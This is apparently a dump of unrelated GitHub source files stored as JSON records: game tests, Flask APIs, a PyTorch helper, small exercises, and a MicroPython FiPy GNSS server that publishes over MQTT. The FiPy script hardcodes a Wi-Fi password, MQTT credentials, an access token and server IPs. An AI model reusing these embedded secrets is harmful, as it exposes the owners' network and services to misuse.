= [lambda api: api.getPlayerLocation(1)[0], lambda api: api.getPlayerLocation(1)[1],\n lambda api: api.getCurrentDirection(1),\n lambda api: api.getPlayerLocation(2)[0], lambda api: api.getPlayerLocation(2)[1],\n lambda api: api.getCurrentDirection(2)]\n a_priori_title = [\"location_x\", \"location_y\", \"direction\", \"opponent_x\", \"opponent_y\", \"opponent_direction\"]\n a_posteriori_methods = 
[lambda api: 1000 if api.hasWon(1) else 0]\n a_posteriori_titles = [\"final_points\"]\n a_priori_components = []\n a_posteriori_components = []\n for i in range(len(a_priori_methods)):\n a_priori_components.append(Component(a_priori_methods[i], a_priori_title[i]))\n for i in range(len(a_posteriori_methods)):\n a_posteriori_components.append(Component(a_posteriori_methods[i], a_posteriori_titles[i]))\n cls.gatherer = Gatherer(a_priori_components, a_posteriori_components)\n cls.routine = ThoroughRoutine(cls.gatherer, (GO_UP, GO_LEFT, GO_RIGHT, GO_DOWN),\n lambda api: {player: 100 * api.hasWon(player) for player in (1, 2)},\n must_keep_temp_files=True, must_write_files=True)\n cls.api = cls.loop.api\n\n def test_gathering_possibility_to_win_in_one_turn(self):\n found = False\n i = 0\n self.a_priori_data, self.a_posteriori_dict = self.routine.routine(1, self.api)\n for i in range(len(self.a_priori_data)):\n if (self.a_priori_data.take((i,)) == np.array([1, 1, 0, 0, 2, 1])).all().all():\n found = True\n break\n if not found:\n self.assertTrue(False)\n else:\n self.assertListEqual(self.a_posteriori_dict[3].take((i,)).get_values().ravel().tolist(), [0., 1., 1.])\n\n def test_gathering_no_way_out(self):\n found = False\n i = 0\n self.a_priori_data, self.a_posteriori_dict = self.routine.routine(1, self.api)\n for i in range(len(self.a_priori_data)):\n if (self.a_priori_data.take((i,)) == np.array([2, 0, 3, 1, 1, 2])).all().all():\n found = True\n break\n if not found:\n self.assertTrue(False)\n else:\n self.assertListEqual(self.a_posteriori_dict[0].take((i,)).get_values().ravel().tolist(), [0., -1., 1.])\n\n def test_gathering_limited_number(self):\n routine = ThoroughRoutine(self.gatherer, (GO_UP, GO_LEFT, GO_RIGHT, GO_DOWN),\n lambda api: {player: 100*api.hasWon(player) for player in (1, 2)},\n must_keep_temp_files=False, must_write_files=False, max_end_states=2)\n a_priori_data, a_posteriori_dict = routine.routine(1, self.api.copy())\n self.assertEqual(len(routine._actionsSequences), 2 * routine._maxEndStates) # 2 players\n\n\nclass TestLazerbikeRandomData(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n pygame.init()\n\n cls.loop = create_game(({1: Passive, 2: Passive}, {1: 1, 2: 2}))\n\n a_priori_methods = [lambda api: api.getPlayerLocation(1)[0], lambda api: api.getPlayerLocation(1)[1],\n lambda api: api.getCurrentDirection(1),\n lambda api: api.getPlayerLocation(2)[0], lambda api: api.getPlayerLocation(2)[1],\n lambda api: api.getCurrentDirection(2)]\n a_priori_title = [\"location_x\", \"location_y\", \"direction\", \"opponent_x\", \"opponent_y\", \"opponent_direction\"]\n a_posteriori_methods = [lambda api: 1000 if api.hasWon(1) else 0]\n a_posteriori_titles = [\"final_points\"]\n a_priori_components = []\n a_posteriori_components = []\n for i in range(len(a_priori_methods)):\n a_priori_components.append(Component(a_priori_methods[i], a_priori_title[i]))\n for i in range(len(a_posteriori_methods)):\n a_posteriori_components.append(Component(a_posteriori_methods[i], a_posteriori_titles[i]))\n cls.gatherer = Gatherer(a_priori_components, a_posteriori_components)\n cls.routine = RandomRoutine(cls.gatherer, (GO_UP, GO_LEFT, GO_RIGHT, GO_DOWN),\n lambda api: {player: 100 * api.hasWon(player) for player in (1, 2)},\n 1, 10, max_end_states=100, must_keep_temp_files=False, must_write_files=False)\n cls.api = cls.loop.api\n\n def test_actions(self):\n res = None\n beginning_api = self.api.copy()\n while res is None:\n res = self.routine.routine(1, beginning_api.copy())\n for i in 
range(0, res.shape[0], 2):\n api = beginning_api.copy()\n line = [int(res.loc[i][k]) for k in range(len(res.loc[i])) if res.loc[i][k] == res.loc[i][k]]\n line2 = [int(res.loc[i+1][k]) for k in range(len(res.loc[i+1])) if res.loc[i+1][k] == res.loc[i+1][k]]\n self.assertEqual(len(line), len(line2))\n has_won = {1: bool(line[0]), 2: bool(line2[0])}\n line = line[1:]\n line2 = line2[1:]\n for j in range(len(line)):\n succeeded = api.performMove(1, api.decodeMove(1, line[j]))\n succeeded2 = api.performMove(2, api.decodeMove(2, line2[j]))\n self.assertTrue(succeeded2 and succeeded)\n self.assertTrue(api.isFinished())\n self.assertTrue(api.hasWon(1) == has_won[1])\n self.assertTrue(api.hasWon(2) == has_won[2])\n","repo_name":"Angeall/pyTGF","sub_path":"pytgf/test/test_data/test_lazerbike_data.py","file_name":"test_lazerbike_data.py","file_ext":"py","file_size_in_byte":6310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7661770385","text":"\nimport torch \nimport random\n\ndef randRGB(seed=None):\n if seed is not None:\n random.seed(seed)\n r = random.random()\n g = random.random()\n b = random.random()\n rgb = [r, g, b]\n return rgb\n\ndef apply_instance_masks(image, masks, confidence, device, ids=None):\n\n masks = masks.squeeze(1)\n \n background_mask = torch.zeros((1, *masks[0].shape), device=device)\n background_mask = background_mask.new_full(background_mask.shape, confidence)\n \n masks = torch.cat([background_mask, masks], dim=0)\n \n mask_argmax = torch.argmax(masks, dim=0)\n \n if ids is not None:\n mask = torch.tensor(background_mask, dtype=torch.long, device=device)\n for idx, obj_id in enumerate(ids):\n mask = torch.where((mask_argmax == idx + 1), obj_id, mask)\n else:\n mask = mask_argmax\n\n max_val = mask.max()\n\n for i in range(1, max_val + 1):\n for c in range(3):\n alpha = 0.45\n color = randRGB(i)\n image[c, :, :] = torch.where(mask == i,\n image[c, :, :] *\n (1 - alpha) + alpha * color[c],\n image[c, :, :])\n return image","repo_name":"juanb09111/semantic_depth","sub_path":"utils/apply_instance_mask.py","file_name":"apply_instance_mask.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"10482415616","text":"\"\"\"\nAPI endpoints for \"event bookmark\" package.\n\"\"\"\n\nfrom werkzeug.exceptions import Forbidden, HTTPException\nfrom flask import request, current_app, g\nfrom flask_restful import abort\nfrom sqlalchemy.exc import IntegrityError\nfrom sqlalchemy.orm import load_only, joinedload\nfrom flasgger import swag_from\nfrom sqlalchemy.inspection import inspect\n\nfrom app import db, c_abort\nfrom app.base.api import AuthResource\nfrom app.resources.event_bookmarks.models import EventBookmark\nfrom app.resources.event_bookmarks.schemas import (\n EventBookmarkSchema, EventBookmarkReadArgsSchema)\nfrom app.resources.events.models import Event\nfrom app.resources.event_types.models import EventType\nfrom app.base import constants as APP\n\n\n# main schema for input and output\nevent_bookmark_schema = EventBookmarkSchema()\n# schema for reading get arguments\nevent_bookmark_read_schema = EventBookmarkReadArgsSchema(strict=True)\n\n\nclass EventBookmarkAPI(AuthResource):\n \"\"\"\n Create, delete, get API for event bookmark\n \"\"\"\n\n @swag_from('swagger_docs/event_bookmark_post.yml')\n def post(self):\n \"\"\"\n Create event bookmark\n \"\"\"\n json_data = request.get_json()\n if not json_data:\n 
c_abort(400)\n model = None\n try:\n # validate and deserialize input into object\n data, errors = event_bookmark_schema.load(json_data)\n if errors:\n c_abort(422, errors=errors)\n\n model = Event.query.filter(Event.row_id == data.event_id).first()\n if model is None or model.deleted:\n c_abort(404, message='Event id: %s does not exist' %\n str(data.event_id))\n\n data.created_by = g.current_user['row_id']\n data.account_id = g.current_user['account_id']\n\n db.session.add(data)\n db.session.commit()\n except HTTPException as e:\n raise e\n except IntegrityError as e:\n db.session.rollback()\n if APP.DB_ALREADY_EXISTS in e.orig.diag.message_detail.lower():\n # format of the message:\n # Key (created_by, event_id)=(2, 6) already exists.\n column = e.orig.diag.message_detail.split('(')[1][:-2]\n c_abort(422, message=APP.MSG_ALREADY_EXISTS, errors={\n column: [APP.MSG_ALREADY_EXISTS]})\n # for any other unknown db errors\n current_app.logger.exception(e)\n abort(500)\n except Exception as e:\n current_app.logger.exception(e)\n abort(500)\n\n return {'message': 'EventBookmark added %s' % str(data.row_id),\n 'row_id': data.row_id}, 201\n\n @swag_from('swagger_docs/event_bookmark_delete.yml')\n def delete(self, row_id):\n \"\"\"\n Delete event bookmark by id\n \"\"\"\n model = None\n try:\n model = EventBookmark.query.get(row_id)\n if model is None:\n c_abort(404, message='EventBookmark id: %s does not exist' %\n str(row_id))\n if model.created_by != g.current_user['row_id']:\n c_abort(403)\n\n db.session.delete(model)\n db.session.commit()\n except Forbidden as e:\n raise e\n except HTTPException as e:\n raise e\n except Exception as e:\n current_app.logger.exception(e)\n abort(500)\n\n return {}, 204\n\n @swag_from('swagger_docs/event_bookmark_get.yml')\n def get(self, row_id):\n \"\"\"\n Get event bookmark by id\n \"\"\"\n model = None\n try:\n model = EventBookmark.query.get(row_id)\n if model is None:\n c_abort(404, message='EventBookmark id: %s does not exist' %\n str(row_id))\n result = event_bookmark_schema.dump(model)\n except Forbidden as e:\n raise e\n except HTTPException as e:\n raise e\n except Exception as e:\n current_app.logger.exception(e)\n abort(500)\n\n return {'results': result}, 200\n\n\nclass EventBookmarkListAPI(AuthResource):\n \"\"\"\n Read API for event bookmark lists, i.e, more than one\n \"\"\"\n\n model_class = EventBookmark\n\n def __init__(self, *args, **kwargs):\n super(EventBookmarkListAPI, self).__init__(*args, **kwargs)\n\n def build_query(self, filters, pfields, sort, pagination, query_session,\n operator, include_deleted=False):\n \"\"\"\n Builds the query by calling parent helpers _build_query,\n _build_final_query\n Also manages extra_filters (combined filters) here if any\n \"\"\"\n query_filters, extra_query, db_projection, s_projection, order, \\\n paging = self._build_query(\n filters, pfields, sort, pagination, operator,\n include_deleted=include_deleted)\n mapper = inspect(Event)\n # build specific extra queries filters\n if extra_query:\n for f in extra_query:\n # dates\n if f in ['start_date_from', 'start_date_to',\n 'end_date_from', 'end_date_to'] and extra_query[f]:\n # get actual field name\n fld = f.replace('_from', '').replace('_to', '')\n # build date query\n if '_from' in f:\n query_filters['filters'].append(\n mapper.columns[fld] >= filters[f])\n continue\n if '_to' in f:\n query_filters['filters'].append(\n mapper.columns[fld] <= filters[f])\n continue\n elif f == 'event_type':\n query_filters['filters'].append(\n EventType.name == 
extra_query[f])\n if sort:\n sort_fxn = 'asc'\n if sort['sort'] == 'dsc':\n sort_fxn = 'desc'\n for sby in sort['sort_by']:\n if sby in mapper.columns:\n order.append(getattr(mapper.columns[sby], sort_fxn)())\n\n if 'event_id' not in filters:\n query_filters['base'].append(\n EventBookmark.created_by == g.current_user['row_id'])\n\n query = self._build_final_query(query_filters, query_session, operator)\n query = query.join(Event).join(EventType)\n\n return query, db_projection, s_projection, order, paging\n\n @swag_from('swagger_docs/event_bookmark_get_list.yml')\n def get(self):\n \"\"\"\n Get the list\n \"\"\"\n models = []\n total = 0\n # parse the request query arguments\n filters, pfields, sort, pagination, operator = self.parse_args(\n event_bookmark_read_schema)\n try:\n # build the sql query\n query, db_projection, s_projection, order, paging = \\\n self.build_query(filters, pfields, sort, pagination,\n db.session.query(EventBookmark), operator)\n # making a copy of the main output schema\n event_bookmark_schema = EventBookmarkSchema()\n if db_projection:\n # change the query to include only requested fields\n query = query.options(load_only(*db_projection))\n if s_projection:\n # change the schema to include only requested fields\n event_bookmark_schema = EventBookmarkSchema(only=s_projection)\n # make query\n full_query = query.order_by(*order).paginate(\n paging['page'], paging['per_page'], error_out=False)\n # prepare models for output dump\n models = [m for m in full_query.items]\n total = full_query.total\n if not models:\n c_abort(404, message='No matching event bookmark found')\n result = event_bookmark_schema.dump(models, many=True)\n except HTTPException as e:\n raise e\n except Exception as e:\n current_app.logger.exception(e)\n abort(500)\n\n return {'results': result.data, 'total': total}, 200\n","repo_name":"Witzcode0/Exchange-connect","sub_path":"app/resources/event_bookmarks/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":8282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"31392183906","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def removeElements(self, head: Optional[ListNode], val: int) -> Optional[ListNode]:\n cur, prev = head, None\n while cur:\n if cur.val == val:\n if prev is None:\n head = head.next\n else:\n prev.next=cur.next\n else:\n prev=cur\n cur=cur.next\n return head","repo_name":"jitaeyun/algorithm","sub_path":"leetcode/Python/remove-linked-list-elements.py","file_name":"remove-linked-list-elements.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"1039805630","text":"#%%\nimport argparse\nimport os\n\nfrom KGUnlearn import model_test\n\n#%%\nif __name__ == \"__main__\":\n pwd = os.getcwd()\n os.environ[\"LOG_DIR\"] = f\"{pwd}/logs\"\n os.environ[\"DATA_PATH\"] = f\"{pwd}/data\"\n args = argparse.Namespace(\n dataset = \"Nations\", # \"FB15K\", \"WN\", \"WN18RR\", \"FB237\", \"YAGO3-10\"\n model = \"TransE\", # TransE, RotE; ComplEx, RotatE\n regularizer = \"N3\",\n reg = 0, \n optimizer = \"Adam\", \n max_epochs = 50, \n patience = 10, \n valid = 2,\n rank = 2, \n batch_size = 1000, \n neg_sample_size = 50, \n dropout = 0, \n init_size = 1e-3, \n learning_rate = 0.005, \n gamma = 1,\n bias = \"constant\",\n dtype = \"double\",\n double_neg = True, \n 
debug = False, \n multi_c = False,\n device = \"cuda:2\",\n random_seed = 0\n )\n\n # deletion_mode, n_del, degree_set, repeat\n # run_influence(args, \"random\", 1, repeat=2, save_model=True)\n # run_influence(args, \"degree\", 1, degree_set={\"entity\": [\"low\", 1], \"relation\": [\"low\", 1]}, repeat=2, save_model=True)\n model = model_test(args)\n\n# %%\n","repo_name":"ZhuYuqicheng/KGEraser","sub_path":"9_pipeline.py","file_name":"9_pipeline.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"11567174257","text":"from microWebSrv import MicroWebSrv\nimport parserGen\nimport pycom\nimport time\nfrom machine import UART\nimport network\nfrom mqtt import MQTTClient\nimport json\t\n\ndef _httpHandlerNEOGet1s(httpClient, httpResponse):\n try:\n latlon, velocity, gpsQ, height, GMT, PDOP, HDOP, VDOP, uniqsatNum = parsedReadings.__next__() \n except:\n latlon = velocity = gpsQ = height = GMT = PDOP = HDOP = VDOP = uniqsatNum = 'Error occurred, please restart FiPy...'\n second = 1000 \n httpResponse.WriteResponseOk(\n headers = ({'Cache-Control': 'no-cache'}),\n contentType = 'text/event-stream',\n contentCharset = 'UTF-8',\n content = 'retry: {0}\\n'.format(second)+\n 'data: {0}
\\n'.format('Latitude and Longitude:') +\n            'data: {0}\u2028\u2028\\n'.format(latlon)+\n            'data: {0}\u2028\\n'.format('Velocity:')+\n            'data: {0}\u2028\u2028\\n'.format(velocity)+\n            'data: {0}\u2028\\n'.format('Orthometric height:')+\n            'data: {0}\u2028\u2028\\n'.format(height)+\n            'data: {0}\u2028\\n'.format('Time in GMT:')+\n            'data: {0}\u2028\u2028\\n'.format(GMT)+\n            'data: {0}\u2028\\n'.format('GPS Quality indicator:')+\n            'data: {0}\u2028\u2028\\n'.format(gpsQ)+\n            'data: PDOP:{0} HDOP:{1} VDOP:{2}\u2028\u2028\\n'.format(PDOP, HDOP, VDOP)+\n            'data: {0}\u2028\\n'.format('Number of active satellites:')+\n            'data: {0}\u2028
\\n\\n'.format(uniqsatNum)\n )\n\ndef _httpHandlerTestGet(httpClient, httpResponse) :\n\tcontent = \"\"\"\\\n\t\n\t\n \n \t\n MODE SWITCH\n \n \n

===MODE SWITCH===\u2028\u2028\n        Your IP address = %s\n        \u2028\n\t\t\t\u2028\n\t\t\t\tChoice: type 'mqtt' to switch to MQTT mode...\u2028\n\t\t\t\t\n\t\t\t
\n \n \n\t\"\"\" % httpClient.GetIPAddr()\n\thttpResponse.WriteResponseOk( headers\t\t = None,\n\t\t\t\t\t\t\t\t contentType\t = \"text/html\",\n\t\t\t\t\t\t\t\t contentCharset = \"UTF-8\",\n\t\t\t\t\t\t\t\t content \t\t = content )\n\ndef _httpHandlerTestPost(httpClient, httpResponse) :\n formData = httpClient.ReadRequestPostedFormData()\n status = formData[\"status\"]\n content = \"\"\"\\\n \n \n\t\t\n\t\t\t\n MODE SWITCH\n \n \n

===MODE SWITCH===\u2028\u2028\n        Choice = %s
\n \n \n\t\"\"\" % ( MicroWebSrv.HTMLEscape(status))\n httpResponse.WriteResponseOk( headers\t\t = None,\n\t\t\t\t\t\t\t\t contentType\t = \"text/html\",\n\t\t\t\t\t\t\t\t contentCharset = \"UTF-8\",\n\t\t\t\t\t\t\t\t content \t\t = content )\n\n if status == \"mqtt\":\n print(\">>MQTT mode selected<<\")\n mf = open(\"status.txt\", \"w\")\n mf.write(\"yes\")\n mf.close()\n\ndef switchToParallelMQTT():\n # BEGIN SETTINGS\n AIO_CLIENT_ID = \"Charles\"\n AIO_SERVER = \"203.101.227.137\"\n AIO_PORT = 1883\n AIO_USER = \"qut\"\n AIO_KEY = \"qut\"\n AIO_CONTROL_FEED = \"fipy/test\"\n AIO_RANDOMS_FEED = \"fipy/randoms\"\n\n # Setup thingsboard connection\n THINGSBOARD_HOST = '203.101.225.130'\n QUT01_ACCESS_TOKEN = 'test12345'\n\n # FUNCTIONS\n # Function to respond to messages from Adafruit IO\n def sub_cb(topic, msg): # sub_cb means \"callback subroutine\"\n print((topic, msg)) # Outputs the message that was received. Debugging use.\n\n if msg == b\"ON\": # If message says \"ON\" ...\n pycom.rgbled(0xffffff) # ... then LED on\n\n elif msg == b\"OFF\": # If message says \"OFF\" ...\n pycom.rgbled(0x000000) # ... then LED off\n\n else: # If any other message is received ...\n print(\"Unknown message\") # ... do nothing but output that it happened. \n\n def send_readings():\n try:\n latlon, velocity, gpsQ, height, GMT, PDOP, HDOP, VDOP, uniqsatNum = parsedReadings.__next__() \n except:\n latlon = velocity = gpsQ = height = GMT = PDOP = HDOP = VDOP = uniqsatNum = 'Error occurred, please restart FiPy...'\n\n gnssReadings = \"Laitude and Longitude: {0}, Velocity: {1}, Orthometric height: {2}, Time in GMT: {3}, GPS Quality indicator: {4}, Number of active satellites: {5}, PDOP:{6} HDOP:{7} VDOP:{8}\"\\\n .format(latlon, velocity, gpsQ, height, GMT, uniqsatNum, PDOP, HDOP, VDOP) \n\n if 'Error' in latlon:\n location = {'lat': latlon, 'lon': latlon}\n\n elif 'N/A' in latlon:\n location = {'lat': latlon, 'lon': latlon}\n\n else:\n temp1 = latlon.split(\";\")\n Lat = float(temp1[0].replace(\"S\",\"-\").replace(\"N\",\"\"))\n Lon = float(temp1[1].replace(\"E\",\"\").replace(\"W\",\"-\"))\n location = {'lat': float(Lat), 'lon': float(Lon)}\n \n try:\n print(\"Publishing: {0} to {1} ... \".format(gnssReadings, AIO_RANDOMS_FEED), end='')\n client.publish(topic=AIO_RANDOMS_FEED, msg=str(gnssReadings))\n print(\"DONE\")\n time.sleep(0.5)\n client2.publish(topic='v1/devices/me/attributes', msg=json.dumps(location))\n print(\"coordinate sent: {0}\".format(latlon))\n\n except Exception:\n print(\"FAILED\")\n\n finally:\n print(\"------------------------------------------------------------------------------\")\n\n client2 = MQTTClient(client_id=\"test\", server=THINGSBOARD_HOST, port=1883, user=QUT01_ACCESS_TOKEN, password=QUT01_ACCESS_TOKEN, keepalive=60)\n\n #Connect to Thingsboard using default MQTT port and 60 seconds keepalive intervals\n client2.connect()\n\n print(\">>>connected to things platform<<<\")\n pycom.rgbled(0x00ff00) #green\n # Use the MQTT protocol to connect to Adafruit IO\n client = MQTTClient(AIO_CLIENT_ID, AIO_SERVER, AIO_PORT, AIO_USER, AIO_KEY)\n\n # Subscribed messages will be delivered to this callback\n client.set_callback(sub_cb)\n client.connect()\n client.subscribe(AIO_CONTROL_FEED)\n print(\"Connected to %s, subscribed to %s topic\" % (AIO_SERVER, AIO_CONTROL_FEED))\n pycom.rgbled(0x00ff00) # Status green: online to Adafruit IO \n\n try:\n while True: # Repeat this loop forever\n client.check_msg()# Action a message if one is received. 
Non-blocking.\n send_readings() # Send current GNSS readings\n time.sleep(3) # publish every 3 seconds\n\n except KeyboardInterrupt: \t\t# catches the ctrl-c command, which breaks the loop above\n print(\"Continuous polling stopped\")\n\n finally: # If an exception is thrown ...\n client.disconnect() # ... disconnect the client and clean up.\n client2.disconnect()\n client2 = None\n client = None\n global wlan # add globale so that wlan can be modified\n wlan.disconnect()\n wlan = None\n pycom.rgbled(0x000022) # Status blue: stopped\n print(\"MQTT stopped\")\n\nprint(\">>starting web server<<\")\npycom.rgbled(0xff0000) #red\ntime.sleep(1)\n\nuart = UART(1, baudrate = 115200, pins = ('P3','P4')) # create uart object\nuart.init(115200, bits = 8, parity = None, stop = 1) # init reading\nparsedReadings = parserGen.output(uart) # generator object yields parsed readings\n\n# configure server\nrouteHandlers = [ ( '/read', 'GET', _httpHandlerNEOGet1s ),\n ( \"/test\",\t\"GET\",\t_httpHandlerTestGet ),\n ( \"/test\",\t\"POST\",\t_httpHandlerTestPost )]\nsrv = MicroWebSrv(routeHandlers=routeHandlers, webPath = '/flash/www/')\ntime.sleep(0.25)\nsrv.Start(threaded = True) # start server\npycom.rgbled(0x00ff00) #green\nprint(\">>local webServer started<<\")\ntime.sleep(0.25)\nmf = open(\"status.txt\", \"w\") # use to determine mqtt switch\nmf.close()\nwhile True:\n time.sleep(1)\n condf = open(\"status.txt\", \"r\")\n cond = condf.read()\n condf.close()\n if cond == \"yes\": # use to determine mqtt switch\n print(\">>stopping server<<\")\n pycom.rgbled(0xff0000) #red\n time.sleep(1)\n srv.Stop() #stop server\n print(\">>local server stopped<<\")\n time.sleep(1)\n break\n else:\n pass\nprint(\">>changing WIFI mode<<\")\n# setup as a station\nwlan = network.WLAN(mode=network.WLAN.STA)\nprint(\">>attempting hotspot connection, FiPy is in station mode<<\")\nwlan.connect('TPU4G_L3TN', auth=(network.WLAN.WPA2, '56156271'))\ntime.sleep(5)\nwhile not wlan.isconnected(): #retry every 5 seconds\n wlan.connect('TPU4G_L3TN', auth=(network.WLAN.WPA2, '56156271'))\n time.sleep(5)\nprint(\">>waiting for IP and DNS configuration<<\")\npycom.rgbled(0xff00f4) #ligt purple, wifi connected\nwhile True: # ensure that hotspot's ip config is correctly set up\n ipCond = wlan.ifconfig()[1]\n if ipCond == '0.0.0.0':\n time.sleep(0.5)\n pass\n else:\n break\nprint(wlan.ifconfig())\nprint(\">>connected to hotspot<<\")\ntime.sleep(1)\nswitchToParallelMQTT()","repo_name":"wowkucko/proba","sub_path":"allInOne.py","file_name":"allInOne.py","file_ext":"py","file_size_in_byte":9297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"71062696264","text":"import os\nimport csv\n\n# identify file path\nelection = os.path.join(\"Resources\", \"Election_data.csv\")\n\ncount = {}\ntotal = 0\npercent = {}\nwinner = 0\n\n\nwith open(election) as csv_file:\n elect_reader = csv.reader(csv_file, delimiter=\",\")\n\n header = next(elect_reader)\n\n for row in elect_reader:\n total += 1\n if row[2] in count:\n count[row[2]] += 1\n\n else:\n count[row[2]] = 1\n\nfor candidate in count:\n percent[candidate] = (count[candidate] / total) * 100\n\n if count[candidate] > winner:\n winner= count[candidate]\n won = candidate\n\noutput_path = os.path.join('Analysis', 'Election_Analysis.txt')\n\nwith open(output_path, 'w', newline=\"\") as txtfile:\n\n txtfile.write(f'''\n Election Results\n -------------------------\n Total Votes: {total}\n -------------------------\\n''')\n\n print(f'''\\nElection 
Results\n -------------------------\n Total Votes: {total}\n -------------------------''')\n\n for candidate, votes in count.items():\n txtfile.write(f'{candidate}: {percent[candidate]:.3f}% ({votes})\\n')\n \n print(f'''{candidate}: {percent[candidate]:.3f}% ({votes})''')\n \n txtfile.write(f'''-------------------------\n Winner: {won}\n -------------------------''')\n\n print(f'''-------------------------\n Winner: {won}\n -------------------------''')\n\n\n","repo_name":"LFurman7/Python-Challenge-2-","sub_path":"PyPoll/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3994940097","text":"from string import ascii_letters as AL\nimport re\n\nclass Plugboard(object):\n def __init__(self, wires=''):\n if len(wires)%2!=0 or len(wires)>20 or len(set(wires))!=len(wires):\n raise ValueError('Error!')\n \n self.pairs = {i:i for i in AL}\n \n for i,j in re.findall('.{2}', wires):\n self.pairs[i]=j\n self.pairs[j]=i\n \n def process(self, c):\n try: return self.pairs[c]\n except KeyError: return c\n","repo_name":"Orange9000/Codewars","sub_path":"Solutions/6kyu/6kyu_the_enigma_machine_part1.py","file_name":"6kyu_the_enigma_machine_part1.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"81"} +{"seq_id":"16626120148","text":"import math\n\n\n# Цвета (R, G, B)\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nDARK_BUTTON = (150, 150, 150)\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\nYELLOW = (255, 255, 0)\nGREY = (220, 220, 220)\nBROWN = (221, 153, 102)\n\n# Настройка окна\nscreen_name = 'ahahaha'\nWIDTH = 1500\nHEIGHT = 1000\nFPS = 120\nWALL_SIZE = 100\n\n# Для мобов\n# Значения для спавна мобов\nmobs_values_x = []\nmobs_values_y = []\nmobs_values_player_spawn_x = []\nmobs_values_player_spawn_y = []\nfor i in range(50, WIDTH - 50):\n mobs_values_x.append(i)\nfor i in range(50, HEIGHT - 200):\n mobs_values_y.append(i)\n","repo_name":"Happyigr/dragon_slayer","sub_path":"stuff/Settings.py","file_name":"Settings.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"71298325051","text":"\"\"\"server.py\nРеализация сервера для мессенеджера\n\"\"\"\nimport time as t\nfrom datetime import datetime\nfrom flask import Flask, request, jsonify, abort\nfrom pokebot import PokeBot\n\napp = Flask(__name__)\n\ndb = []\nusers = set()\nbot = PokeBot()\ndb.append(bot.check_message(\"/help\", \"все\"))\n\n\n@app.route(\"/\")\ndef hello():\n \"\"\"handler for root\n \"\"\"\n return \"Hello, World!\"\n\n\n@app.route(\"/status\")\ndef status():\n \"\"\"handler for status\n return status, name of service, current server time, number of messages and users\n \"\"\"\n return jsonify(\n {\n \"status\": True,\n \"name\": \"Telegraph app\",\n \"time\": datetime.now().strftime(\"%d/%m/%Y %H:%M:%S\"),\n \"messages_count\": len(db),\n \"users_count\": len(users)\n }\n )\n\n\n@app.route(\"/send\", methods=[\"POST\"])\ndef send_message():\n \"\"\"handler for send\n POST body format:\n {\n \"name\" : string,\n \"text\" : string\n }\n validation error - 400,\n return message:\n {\n \"ok\" : True\n }\n Status code for ok: 200\n \"\"\"\n data = request.json\n\n if not isinstance(data, dict):\n return abort(400)\n if set(data.keys()) != {\"name\", \"text\"}:\n return abort(400)\n\n name = data[\"name\"]\n text = 
data[\"text\"]\n\n if not isinstance(name, str) or \\\n not isinstance(text, str) or \\\n name == \"\" or \\\n text == \"\":\n return abort(400)\n\n users.add(name)\n message = {\n 'time': t.time(),\n 'name': name,\n 'text': text,\n }\n db.append(message)\n\n bot_message = bot.check_message(text, name)\n if bot_message:\n db.append(bot_message)\n\n return jsonify(\n {\n \"ok\": True\n }\n )\n\n\n@app.route(\"/messages\", methods=[\"GET\"])\ndef get_messages():\n \"\"\"handler for messages\n GET needs parameter after : float\n validation error - 400,\n return message:\n [\n {\n \"time\" : timestamp,\n \"name\" : string,\n \"text\" : string\n },\n ...\n ]\n Status code for ok: 200\n \"\"\"\n try:\n after = float(request.args[\"after\"])\n except KeyError:\n return abort(400)\n except ValueError:\n return abort(400)\n\n result = []\n for message in db:\n if message['time'] > after:\n result.append(message)\n if len(result) >= 1:\n break\n\n return jsonify(result)\n\n\napp.run()\n","repo_name":"KapitanD/python-messenager","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18154720517","text":"import os\r\ndialogo = []\r\ndef leer():\r\n list = open(\"dialogo.txt\").readlines()\r\n for i in range(len(list)): \r\n dialogo.append(list[i].replace('\\n', '').replace(',','').replace('.',''))\r\n\r\n if os.path.isfile(\"resultado.txt\") == False: open(\"resultado.txt\", \"w+\").close()\r\n\r\ndef write(word):\r\n info = [[0 for i in range(2)] for j in range(8)]\r\n for i in range(len(dialogo)):\r\n linea = dialogo[i].split()\r\n c = 0\r\n for x in range(len(linea)): \r\n if linea[x].lower() == word: c+=1\r\n if c > 0: info[i] = [i+1,c]\r\n else: info[i] = [i+1,0]\r\n\r\n print(f'Palabra a buscar: {word}')\r\n for i in range(len(info)): print(f\"Linea {i+1} - {info[i][1]}\")\r\n\r\n with open(\"resultado.txt\", 'a') as f: \r\n f.write(f'Palabra a buscar: {word}\\n')\r\n for i in range(len(dialogo)): f.write(f\"Linea {i+1} - {info[i][1]}\\n\")\r\n \r\n input('*presione enter para continuar')\r\n main()\r\n\r\ndef main():\r\n leer()\r\n while True:\r\n os.system('clear' if os.name == 'posix' else 'cls')\r\n word = input('Ingrese una palabra: ')\r\n write(word)\r\n\r\nif __name__ == '__main__':\r\n 